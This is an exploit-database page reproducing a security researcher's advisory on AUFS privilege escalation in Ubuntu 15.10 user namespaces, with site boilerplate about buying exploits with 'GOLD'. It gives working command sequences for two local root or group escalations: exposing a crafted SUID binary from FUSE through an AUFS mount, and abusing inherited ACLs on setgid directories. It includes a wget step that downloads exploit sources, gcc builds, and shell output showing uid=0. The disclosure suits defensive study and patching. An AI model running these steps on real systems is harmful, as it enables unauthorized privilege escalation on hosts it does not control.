0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Ubuntu 15.10 AUFS - allow_userns Fuse/Xattr User Namespaces Privilege Escalation Vulnerability
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
Source: http://www.halfdog.net/Security/2016/AufsPrivilegeEscalationInUserNamespaces/ ## Introduction Problem description: Aufs is a union filesystem to mix content of different underlying filesystems, e.g. read-only medium with r/w RAM-fs. That is also allowed in user namespaces when module was loaded with allow_userns option. Due to different bugs, aufs in a crafted USERNS allows privilege escalation, which is a problem on systems enabling unprivileged USERNS by default, e.g. Ubuntu Wily. All the issues mentioned here were discovered after performing similar analysis on overlayfs, another USERNS enabled union filesystem. For a system to be exposed, unprivileged USERNS has to be available and AUFS support enabled for it by loading the aufs module with the appropriate option: modprobe aufs allow_userns. ## AUFS Over Fuse: Loss of Nosuid Method: Fuse filesystem can be mounted by unprivileged users with the help of the fusermount SUID program. Fuse then can simulate files of any type, mode, UID but they are only visible to the user mounting the filesystem and lose all SUID properties. Those files can be exposed using aufs including the problematic SUID properties. The basic exploitation sequence is: Mount fuse filesystem exposing crafted SUID binary Create USERNS Mount aufs on top of fuse Execute the SUID binary via aufs from outside the namespace The issue can then be demonstrated using: SuidExec (http://www.halfdog.net/Misc/Utils/SuidExec.c) FuseMinimal (http://www.halfdog.net/Security/2016/AufsPrivilegeEscalationInUserNamespaces/FuseMinimal.c) UserNamespaceExec (http://www.halfdog.net/Misc/Utils/UserNamespaceExec.c) test$ mkdir fuse mnt work test$ mv SuidExec RealFile test$ ./FuseMinimal fuse test$ ./UserNamespaceExec -- /bin/bash root$ mount -t aufs -o br=work:fuse none mnt root$ cd mnt # Now cwd of the former process is within the aufs mount. Use # another shell to complete. test$ /proc/2390/cwd/file /bin/bash root$ id uid=0(root) gid=100(users) groups=100(users) # Go back to old shell for cleanup. root$ cd ..; umount mnt; exit test$ fusermount -u fuse Discussion: In my opinion, fuse filesystem allowed pretending to have files with different UIDs/GIDs in the local mount namespace, but they never had those properties, those files would have, when really stored on local disk. So e.g., the SUID binaries lost their SUID-properties and the owner could also modify arbitrary file content, even if file attributes were pretending, that he does not have access - by having control over the fuse process simulating the filesystem, such access control is futile. That is also the reason, why no other user than the one mounting the filesystem may have rights to access it by default. In my optionion the workarounds should be to restrict access to fuse also only to the mount namespace where it was created. ## AUFS Xattr Setgid Privilege Escalation Method: Due to inheritance of Posix ACL information (xattrs) when aufs is copying files and not cleaning those additional and unintended ACL attribues, SGID directories may become user writable, thus allowing to gain privileges of this group using methods described in SetgidDirectoryPrivilegeEscalation (http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/). Suitable target directories can be easily found using find / -perm -02020 2> /dev/null. On standard Ubuntu system those are: /usr/local/lib/python3.4 (root.staff) /var/lib/libuuid (libuuid.libuuid) /var/local (root.staff) /var/mail (root.mail) Exploitation can be done just combining standard tools with the SetgidDirectoryPrivilegeEscalation (http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/) exploit. test$ wget -q http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/CreateSetgidBinary.c http://www.halfdog.net/Misc/Utils/UserNamespaceExec.c http://www.halfdog.net/Misc/Utils/SuidExec.c test$ gcc -o CreateSetgidBinary CreateSetgidBinary.c test$ gcc -o UserNamespaceExec UserNamespaceExec.c test$ gcc -o SuidExec SuidExec.c test$ mkdir mnt test test$ setfacl -m "d:u:$(id -u):rwx" test test$ ./UserNamespaceExec -- /bin/bash root$ mount -t aufs -o br=test:/var none mnt root$ chmod 07777 mnt/mail root$ umount mnt; exit test$ ./CreateSetgidBinary test/mail/escalate /bin/mount x nonexistent-arg test$ test/mail/escalate ./SuidExec /usr/bin/id uid=1000(test) gid=8(mail) groups=8(mail),100(users) On Ubuntu, exploitation allows interference with mail spool and allows to gain privileges of other python processes using python dist-packages owned by user root.staff. If root user calls a python process in that way, e.g. via apport crash dump tool, local root escalation is completed. According to this post (http://www.openwall.com/lists/oss-security/2016/01/16/7), directories or binaries owned by group staff are in the default PATH of the root user, hence local root escalation is trivial. # 0day.today [2024-09-28] #